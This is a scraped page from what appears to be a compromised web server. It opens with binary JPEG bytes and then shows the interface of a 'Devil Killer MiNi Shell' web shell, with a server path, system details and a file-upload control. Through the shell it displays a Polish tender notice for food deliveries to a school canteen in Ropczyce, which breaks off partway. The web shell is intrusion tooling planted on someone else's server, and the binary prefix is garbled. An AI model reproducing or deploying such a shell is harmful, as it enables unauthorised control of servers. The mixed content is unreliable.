JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231124/0051229401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach w 2024 r.- I etap&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Nr 5 w Ropczycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 691750349</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ropczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172220277</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">misiuraj@zojoropczyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://jo.ropczyce.bip.gmina.pl/index.php?id=771</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach w 2024 r.- I etap&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d4020f28-8a9c-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00512294</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/jo.ropczyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">:https://platformazakupowa.pl/pn/jo.ropczyce</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym <br/>a Wykonawcami, w tym składanie ofert, oświadczeń, zawiadomień oraz przekazywanie informacji (np. zadawanie pytań, uzupełnianie oświadczeń lub dokumentów na wezwanie Zamawiającego) odbywa się elektronicznie za pośrednictwem https://platformazakupowa.pl/ i formularza Nowa wiadomość dostępnego w zakładce Wiadomości na stronie dotyczącej prowadzonego postępowania. <br/>2.	Wymagania techniczne i organizacyjne wysyłanie i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie platformazakupowa.pl, zwanym dalej „regulaminem” dostępnym na stronie głównej platformy. <br/>3.	Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>4.	Strona internetowa postępowania dostępna jest pod adresem: Profil Nabywcy - Zespół Obsługi Jednostek Oświatowych w Ropczycach (platformazakupowa.pl) <br/>5.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz podmiotowe środki oraz inne dokumenty lub oświadczenia, których może żądać Zamawiający od Wykonawcy (Dz. U. 2020. poz. 2415 z dn. 30 grudnia 2020)<br/>6.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>7.	Wykonawca składa ofertę wraz z wymaganymi dokumentami przy użyciu strony internetowej platformazakupowa.pl za pośrednictwem formularza OFERTA dostępnego na stronie dotyczącej prowadzonego postepowania. <br/>8.	Oferta Wykonawcy zostanie zaszyfrowana przez system, tak aby nie można było zapoznać się z jej treścią do terminu otwarcia ofert. <br/>9.	Przekazanie Zamawiającemu oferty w innym trybie niż za pośrednictwem platformy zakupowej będzie uważane za niezłożenie Oferty w przedmiotowym postępowaniu.<br/>10.	Wszelkie pytania i wątpliwości dotyczące prowadzonego postępowania należy kierować przy użyciu platformazakupowa.pl.<br/>11.	Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. <br/>12.	Zamawiający jest zobowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął nie później niż na 4 dni przed upływem terminu składania ofert.<br/>13.	Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w ust. 12, przedłuża termin składania ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych Wykonawców <br/>z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia ofert. W przypadku gdy wniosek o wyjaśnienie treści SWZ <br/>14.	nie wpłynął w terminie, o którym mowa w ust. 12, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania ofert.<br/>15.	Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku, <br/>o którym mowa w ust. 11. <br/>16.	Zamawiający nie przewiduje zwołania zebrania Wykonawców w celu wyjaśnienia wątpliwości dotyczących treści SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/ 679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenia o ochronie danych) (Dz. U. UE L 119 z 04.05.2016, str. 1) dalej zwanym „RODO’ informuję, że:<br/>1)	administratorem Pana/Pani danych osobowych jest Zespól Szkół nr 5 w Ropczycach,<br/>2)	inspektorem danych osobowych jest Pani Maria Świniuch. Pani/ Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z udzieleniem zamówienia publicznego,<br/>3)	odbiorcami Pani/ Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP,<br/>4)	Pani/ Pana dane osobowe będą przechowywane zgodnie z art. 78 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>5)	obowiązek podania przez Panią/ Pana danych osobowych bezpośrednio Pani/ Pana dotyczących, jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP,<br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>7)	posiada Pani/ Pan:<br/>- na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/ Pana dotyczących,<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/ Pana danych osobowych,<br/>- na podstawie art. 18 RODO żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , ,<br/>- prawo do wniesienia skargi do Prezesa Izby Urzędu Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/ Pana dotyczących narusza przepisy RODO,<br/>9) nie przysługuje Pani/ Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/ Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOJO.261.5.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: Części nr I zamówienia - Pieczywo, świeże wyroby piekarskie - CPV 15810000-9; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr II -Różne produkty spożywcze - CPV 15800000-6; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) 